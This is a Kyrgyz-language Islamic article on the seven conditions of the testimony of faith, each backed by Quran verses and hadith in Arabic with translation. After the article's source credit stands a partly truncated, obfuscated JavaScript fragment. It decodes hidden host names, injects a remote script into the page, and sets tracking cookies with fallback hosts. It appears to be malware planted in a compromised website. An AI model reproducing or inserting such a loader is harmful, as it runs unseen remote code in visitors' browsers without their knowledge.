Ла илааха илла Алла келмесинин 7 шарты

[button color=»» size=»» type=»square» target=»» link=»»]1-ШАРТ: ИЛИМ[/button]

Келименин нафий жана исбат маанисин түшүнүү. Анын карама-каршысы: жахль (илимсиздик).

 Бул шартка Аллахтын сөзү далил: “Билгиниң Аллахтан башка сыйынууга татыктуу зат жок экендигин, жана өзүңдүн күнөөлөрүң үчүн кечирим сура” (Куран, Мухаммад 47:19)

{فَاعْلَمْ أَنَّهُ لَا إِلَهَ إِلَّا اللَّهُ وَاسْتَغْفِرْ لِذَنْبِكَ }

Ошондой эле: “Алар (мушриктер) дуба кылып жаткан Аллахтан башка «кудайлардын» колунда шапаат жок! Билген абалда Акыйкатка күбө болгон адамдар(га гана шапаат насип кылынат).” (Куран, аз-Зухруф 43:86)

{إِلَّا مَنْ شَهِدَ بِالْحَقِّ وَهُمْ يَعْلَمُونَ}

“Акыйкатка күбө болуу”, б.а. Аллахтан башка эч бир сыйынууга татыктуу зат жок деп айтуу. “Билген абалда”, б.а. тилдери айткан нерсени жүрөктөрү билет.

Хадистен далил: Усман радияллаху анху риваят кылат Аллахтын Элчиси ﷺ айтты: “Ким Аллахтан башка сыйынууга татыктуу зат жок экенин билип өлсө – Бейишке кирет” (Муслим: 26)

عن عثمان بن عفان رضي الله عنه قال قال رسول الله صلى الله عليه وسلم: مَنْ مَاتَ وَهُوَ يَعْلَمُ أَنَّهُ لَا إِلَهَ إِلَّا اللَّهُ دَخَلَ الْجَنَّةَ

[button color=»» size=»» type=»square» target=»» link=»»]2-ШАРТ: ЙАКЫН[/button]

Йакын – терең ишеним. Анын карама-каршысы: шек-күмөн. Келимени айтып жаткан киши бул келиме көрсөткөн нерсеге бекем ишенүүсү.

Аллах чыныгы момундар тууралуу айтты: “Аллахка жана Анын элчисине ыйман келтирип, андан соң шек санабаган жана Аллахтын жолунда малдары, жандары менен күрөшкөндөр гана момун деп эсептелет. Мына ушулар нак чынчылдар.” (Куран, аль-Хужурот 49:15)

إِنَّمَا الْمُؤْمِنُونَ الَّذِينَ آمَنُوا بِاللَّهِ وَرَسُولِهِ ثُمَّ لَمْ يَرْتَابُوا وَجَاهَدُوا بِأَمْوَالِهِمْ وَأَنْفُسِهِمْ فِي سَبِيلِ اللَّهِ أُولَئِكَ هُمُ الصَّادِقُونَ

Бул аятта Аллахка жана Анын элчисине ыйман келтирүүсүндө чынчыл болушуна – ыйманында шектенбөөнү шарттады. Ким шек санаса – ал мунаафык. Алар тууралуу Аллах айтты: “Чынында, Аллахка, Акырет күнүнө ишенбеген жана жүрөктөрү күмөн санагандар гана (артта калууга) уруксат сурашат. Алар өз күмөндөрүндө олку-солку болуп тура беришет.” (Куран, ат-Тауба 9:45)

Абу Хурайра айтат Аллахтын Элчиси ﷺ айтты: “Аллахтан башка сыйынууга татыктуу зат жок экенине жана мен Аллахтын Элчиси экениме күбөлүк берем. Кандай гана пенде болбосун ушул эки келиме менен, аларга күмөн санабастан Аллахты жолуктурса – Бейишке кирет” (Муслим: 27)

وفي صحيح مسلم عن أبي هريرة رضي الله عنه قال قال رسول الله صلى الله عليه وسلم: أَشْهَدُ أَنْ لَا إِلَهَ إِلَّا اللهُ، وَأَنِّي رَسُولُ اللهِ، لَا يَلْقَى اللهَ بِهِمَا عَبْدٌ غَيْرَ شَاكٍّ فِيهِمَا إِلَّا دَخَلَ الْجَنَّةَ

Абу Хурайрадан келген узун хадисте аны Аллахтын элчиси ﷺ жиберип, бул сөздү айтканы баяндалат: “(О, Абу Хурайра!) Аллахтан башка сыйынууга татыктуу зат жок деп, жүрөгү терең ишенип, күбөлүк келтирген кандай гана адамды бул дубалдын артында жолуктурба – аны Бейиш менен сүйүнчүлөй бер” (Муслим: 31)

وفيه عنه رضي الله عنه من حديث طويل أن النبي صلى الله عليه وسلم بعثه بنعليه فقال: مَنْ لَقِيتَ مِنْ وَرَاءِ هَذَا الْحَائِطِ يَشْهَدُ أَنْ لَا إِلَهَ إِلَّا اللَّهُ مُسْتَيْقِنًا بِهَا قَلْبُهُ فَبَشِّرْهُ بِالْجَنَّةِ

[button color=»» size=»» type=»square» target=»» link=»»]3- ШАРТ: ЫКЛАС[/button]

Туура ниет аркылуу ширктин бардык түрлөрүнөн ибадатты тазалоо. Анын карама-каршысы: ширк жана рия.

 Аллах Таала айтат: “Көңүл бургула! Таза дин Аллахка гана таандык!” (Куран, аз-Зумар 39:3)

{أَلَا لِلَّهِ الدِّينُ الْخَالِصُ}

Дагы айтты: “Алар Аллахка ханиф абалында, динди таза тутуп сыйынууга, намаздарды орундоого, зекет берүүгө гана буюрулган эле. Мына бул – туура дин” (Куран, аль-Баййина 98:5)

{وَمَا أُمِرُوا إِلَّا لِيَعْبُدُوا اللَّهَ مُخْلِصِينَ لَهُ الدِّينَ}

 Абу Хурайрадан риваят Пайгамбарыбыз ﷺ айтты: “Акыр Кыямат күнүн менин шапаатым себептүү эң бактылуу болгон адам – Ля иляха илляЛляху келимесин жүрөгүндөгү (же дилиндеги) ыкласы менен айткан адам” (Бухари: 99)

عن أبي هريرة رضي الله عنه عن النبي صلى الله عليه وسلم قال: أَسْعَدُ النَّاسِ بِشَفَاعَتِي يَوْمَ القِيَامَةِ، مَنْ قَالَ لاَ إِلَهَ إِلَّا اللَّهُ، خَالِصًا مِنْ قَلْبِهِ أو نفسه

 Ъитбан ибн Малик Пайгамбарыбыздан ﷺ риваят кылды: “Аллахтын Жүзүнө умтулуп Ля иляха илляЛляху келимесин айткан кишиге – Аллах Тозокту арам кылды”(Бухари: 425; Муслим: 33)

عن عتبان بن مالك رضي الله عنه عن النبي صلى الله عليه وسلم: إن الله حرم على النار من قال لا إله إلا الله يبتغي بذلك وجه الله عز وجل

[button color=»» size=»» type=»square» target=»» link=»»]4-ШАРТ: ЧЫНЧЫЛДЫК[/button]

Келимени чын жүрөктөн айтуу. Тили менен айтканга жүрөгү шайкеш келүү. Анын карама-каршысы: калп.

 Мунаафыктарды жемелеп Аллах Таала айтат: “(О, Мухаммад!) Эгер сага мунаафыктар келсе «биз күбөлүк беребиз: сен Аллахтын элчисисиң» дешет. Аллах билет, сен Анын элчиси экениңди. Аллах болсо мунаафыктардын анык жалганчылар экенине күбөлүк берет” (Куран, аль-Мунаафикуун 63:1)

{ إِذَا جَاءَكَ الْمُنَافِقُونَ قَالُوا نَشْهَدُ إِنَّكَ لَرَسُولُ اللَّهِ وَاللَّهُ يَعْلَمُ إِنَّكَ لَرَسُولُهُ وَاللَّهُ يَشْهَدُ إِنَّ الْمُنَافِقِينَ لَكَاذِبُونَ}

Себеби алар келимени айтышат эле, бирок жүрөктөрүндө ага ишенишпейт эле.

Аллах Таала айтты: “Алиф. Лам. Мим. Адамдар «ыйман келтирдик» деп айтса эле, сыналбай калабыз деп ойлошобу? Албетте Биз алардан мурункуларды да сынаганбыз. Натыйжада Аллах («ыймандуубуз» деген сөздөрүндө) чынчыл болгондорду да билип алат, жалганчыларды да билип алат.” (Куран, аль-Ъанкабут 29:1-3)

الم أَحَسِبَ النَّاسُ أَنْ يُتْرَكُوا أَنْ يَقُولُوا آمَنَّا وَهُمْ لَا يُفْتَنُونَ وَلَقَدْ فَتَنَّا الَّذِينَ مِنْ قَبْلِهِمْ فَلَيَعْلَمَنَّ اللَّهُ الَّذِينَ صَدَقُوا وَلَيَعْلَمَنَّ الْكَاذِبِينَ

Муъаз ибн Жабал риваят кылат Пайгамбар ﷺ айтты дейт: “Ким гана болбосун чын жүрөктөн Аллахтан башка сыйынууга татыктуу зат жок, Мухаммед Аллахтын кулу жана элчиси деп күбөлүк бербесин – Аллах аны Тозокко арам кылат” (Бухари: 128; Муслим: 32)

وفي الصحيحين عن معاذ بن جبل رضي الله عنه عن النبي صلى الله عليه وسلم: مَا مِنْ أَحَدٍ يَشْهَدُ أَنْ لاَ إِلَهَ إِلَّا اللَّهُ وَأَنَّ مُحَمَّدًا عبده ورسوله، صِدْقًا مِنْ قَلْبِهِ، إِلَّا حَرَّمَهُ اللَّهُ عَلَى النَّارِ

Оттон кутулууга бул келимени чын жүрөк менен айтууну шарт кылды. Тили менен айтып, бирок жүрөгү ал нерсеге шайкеш келбесе – ал эч пайда бербейт.

[button color=»» size=»» type=»square» target=»» link=»»]5-ШАРТ: СҮЙҮҮ[/button]

Анын карама-каршысы: жек көрүү. Келимени айткан киши Аллахты, Анын Элчисин ﷺ, ибадаттарды жана Шариатты карманган такыба мусулмандарды сүйүүсү. Ошондой эле “Ля иляха илляЛлаху” келимесине каршы болгондорду – келимени толугу менен жок кылып жиберчү ширк жана куфрду же болбосо келименин толуктугун кемсинткен бидаат жана күнөөлөрдү – жек көрүүсү, о.э. куфр, бидаат же күнөөлөрдү жасап жаткан адамдарды жек көрүүсү.

Себеби хадисте келет: “Ыймандын эң бекем туткасы – Аллах үчүн сүйүү жана Аллах үчүн жек көрүү” (Сахих аль-Жамиъ: 2539).

Сүйүү ыймандын шарттарынын бири экендигине далил Аллах Тааланын сөзү: “Адамдардын арасында кээ бирөөлөр, Аллахтан башка нерселерди (Аллахка) тең (шерик) кылып алышат (жана) аларды Аллахты сүйгөндөй сүйүшөт. Ыймандуу адамдар Аллахты көбүрөөк сүйүшөт.” (Куран, аль-Бакара 2:165).

{وَمِنَ النَّاسِ مَنْ يَتَّخِذُ مِنْ دُونِ اللَّهِ أَنْدَادًا يُحِبُّونَهُمْ كَحُبِّ اللَّهِ وَالَّذِينَ آمَنُوا أَشَدُّ حُبًّا لِلَّهِ}

Момундар Аллахты көбүрөөк сүйүшөт. Себеби алар сүйүүлөрүн Аллахтан башка эч кимге арнашпайт. Ал эми Аллахты сүйөбүз деп, бирок сүйүүсүндө Ага шерик кошкон мушриктер – өзүлөрүнүн сыйынган заттарын Аллахты сүйгөндөй сүйүшөт.

Пенденин Аллахты сүйгөнүнүн белгиси – өз напсиси каалабаса да Аллах жакшы көргөн нерсени биринчи койгону, напсиси ага ийилип турса да Аллах жек көргөн нерсени жек көргөнү, Аллах жана Анын Элчиси дос туткандарды дос тутканы, Аллах жана Анын Элчиси душман туткандарды душман тутканы, Аллахтын Элчисинин ﷺ ээрчигени жана ал көрсөтүп кеткен жолду карманганы.

Анас ибн Малик айтат Аллахтын Элчиси ﷺ айтты: “Кимде бул үч нерсе болсо ыймандын лазатын татыптыр: ага Аллах жана Анын Элчиси бардыгынан сүйкүмдүүрөөк болсо, башка бир кишини сүйгөн болсо аны Аллахтын гана ыраазычылыгы үчүн сүйсө, Отко ыргытылууну кандай жаман көргөн болсо каапырчылыкка кайтууну дал ошондой эле жаман көрсө” (Бухари, Муслим)

[button color=»» size=»» type=»square» target=»» link=»»]6-ШАРТ: МОЮН СУНУУ[/button]

Келиме көрсөткөн нерсеге баш ийүү, Аллах кандай гана буйрук бербесин аны кетенчиктебестен аткаруу, Шариатта айтылган өкүмдөрдү орундоо. Анын карама-каршысы: таштоо. Аллах Таала айтты: “Раббиңерге кайткыла жана Ага моюн сунгула” (Куран, аз-Зумар 39:54)

{وَأَنِيبُوا إِلَى رَبِّكُمْ وَأَسْلِمُوا لَهُ }

Дагы айтты: “Ким жакшы иштерди аткарган акыбалда, жүзүн Аллахка багындырган болсо – эң бекем тутканы карманыптыр” (Куран, Лукман 31:22)

{وَمَن يُسْلِمْ وَجْهَهُ لله وَهُوَ مُحْسِنٌ فَقَدْ اسْتَمْسَكَ بِالعُرْوَةِ الوُثْقَى}

Жакшы иштерди аткарган (мухсин) – бул Таухидди тутунган адам (муваххид). Жүзүн Аллахка багындырган – бул Аллахка баш ийүү. Эң бекем тутка (аль-ъурва аль-вуско) – бул Ля иляха илляЛлаху келимеси.

Демек ким жүзүн Аллахка багындырбаса жана жакшы иштерди аткарбаса – бекем тутканы карманбаптыр. Ошондуктан кийинки аятта айтылат: “Ким каапыр болсо, анын каапырчылыгы сени капа кылбасын. Өзүбүзгө кайтып келишет. Анан Биз аларга кылган иштеринин кабарын беребиз.” (Куран, Лукман 31:23)

[button color=»» size=»» type=»square» target=»» link=»»]7-ШАРТ: КАБЫЛ КЫЛУУ[/button]

Бул келимени жүрөк жана тил менен акыйкатта кабыл кылуу зарыл. Анын карама-каршысы: четке кагуу. Аллах бизге Курандын канча жеринде Ля иляха илляЛляху келимесин кабыл кылган коомдордун кутулганы, кабыл кылбагандардын кыйроого учурап жок болгону тууралуу кабарлады. “Андан соң Биз Өз элчилерибизди жана ыйман келтирген адамдарды куткарабыз. Ыймандуу адамдарды ушинтип куткаруу — Биз үчүн милдет.” (Куран, Юнус 10:103)

 Кабыл кылуунун милдеттүүлүгүнө далил: “Качан аларга «Аллахтан башка сыйынууга татыктуу зат жок» деп айтылганда алар текеберленишет эле, жана: «Биз өзүбүздүн сыйынып жаткан иляхтарыбызды ушул жинди акын үчүн таштайт белек?!» дешет эле.” (Куран, ас-Сооффаат 37:35-36)

إِنَّهُمْ كَانُوا إِذَا قِيلَ لَهُمْ لَا إِلَهَ إِلَّا اللَّهُ يَسْتَكْبِرُونَ وَيَقُولُونَ أَئِنَّا لَتَارِكُو آلِهَتِنَا لِشَاعِرٍ مَجْنُونٍ

Шариатта келген нерселерди толук кабыл кылуу керек. Кабыл кылбагандар, же каалаганын алып, каалабаганын кабыл кылбагандар – келименин бул шартын орундабаган болушат.

Абу Муса аль-Ашъарий риваят кылат Пайгамбар ﷺ айтты: “Чындыгында, Аллах мени менен жиберген хидаят жана илимдин мисалы – жерге түшкөн жаан сымал. [Жердин] кээ бир бөлүгү жакшы эле: ал сууну өзүнө сиңирип, көптөгөн чөптөрдү чыгарды. Башка бир бөлүгү калың катмарлуу кургак жер. Ал сууну өзүнө кармап калат да, Аллах ал аркылуу адамдарга пайда берет: андан өзүлөрү ичишет, малдарын жана эгиндерин сугарышат. Ошондой эле [жаан] дагы бир бөлүккө – жалаң түздүк жерге – жаады: ал же сууну кармап калбады, же чөп чыгарып бербеди. [Жердин бул бөлүкчөлөрү] мындай адамдардын мисалындай: Аллах Тааланын дининде илимдүү болуп, Аллах мени менен жиберген нерседен пайда алган, өзү үйрөнүп жана башкаларды үйрөткөн; жана өзү ага умтулбаган, мен жиберилген хадиятты кабыл кылбаган адам сыяктуу” (Бухари: 79; Муслим: 2282)

وعن أبي موسى رضي الله عنه قال قال رسول الله صلى الله عليه وسلم: إِنَّ مَثَلُ مَا بَعَثَنِي اللهُ بِهِ مِنَ الْهُدَى وَالْعِلْمِ كَمَثَلِ غَيْثٍ أَصَابَ أَرْضاً فَكَانَتْ منها طائفةٌ طَيِّبَةٌ قَبِلَتِ الْمَاءَ وَأَنْبَتَتِ الْكَلأَ والْعُشْبَ الْكَثِيْرَ فَكَانَ مِنْهَا أَجَادِبُ أَمْسَكَتِ الْمَاءَ فَنَفَعَ اللهُ بِهَا النَّاسَ فَشَرِبُوا مِنْهَا وَسَقَوْا وَزَرَعُوا وَأَصَابَ طَائِفَةً أُخْرَى مِنْهَا إِنَّمَا هِي قِيعَانٌ لَا تُمْسِكُ مَاءً وَلَا تُنْبِتُ كَلَأً فَذَلِكَ مَثَلُ مَنْ فَقُهَ فِي دِينِ اللهِ تَعَالَى وَنَفَعَهُ مَا بَعَثَنِي اللهُ بِهِ فَعَلِمَ وَعَلَّمَ وَمَثَلُ مَنْ لَمْ يَرْفَعْ بِذَلِكَ رَأْساً وَلَمْ يَقْبَلْ هُدَى اللهِ الَّذِي أُرْسِلْتُ بِهِ

Булак : Шейх Абдурахман ибн Хасандын Ла илаха илла Алла келмесинин шарттары деген китебинен алынды.

Даярдаган : ИсламЖолу

script>// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "islamjolu.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

Share

You may also like...

Добавить комментарий